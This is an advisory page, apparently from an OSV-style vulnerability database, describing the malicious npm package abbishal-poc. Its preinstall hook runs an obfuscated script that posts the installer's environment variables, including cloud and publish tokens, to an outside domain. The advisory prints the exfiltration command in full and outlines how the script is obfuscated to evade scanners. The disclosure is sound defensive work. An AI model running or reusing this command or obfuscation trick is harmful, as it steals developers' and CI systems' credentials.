abbishal-poc@1.1.0
Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC
OSV ID
MAL-2026-17545
Ecosystem
npm
Summary
On npm install, package.json's preinstall hook runs sh./test.sh, which uses character-split variable obfuscation (b=e, i=c, s=n, h=u, a=v, l=rl) to reconstruct and execute curl -d "$(env)" https://abbishal.com/sh/poc. The script dumps the installer's full process environment — which on CI/CD and developer hosts typically contains cloud credentials (AWS_*), publish tokens (NPM_TOKEN), source-control tokens (GITHUB_TOKEN) and other secrets — and POSTs the contents to the author-controlled domain abbishal.com. The destination is hardcoded and not caller-configurable. In-script comments explicitly describe evading npm's malware scanners, and the README's claims of 'no network requests' and 'no data collection' contradict the actual behavior.
Source: amazon-inspector (f3d3f60fb75143a3cdfedea0c2f185e0556053cd458cd5e76cd5303bf406eb32)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.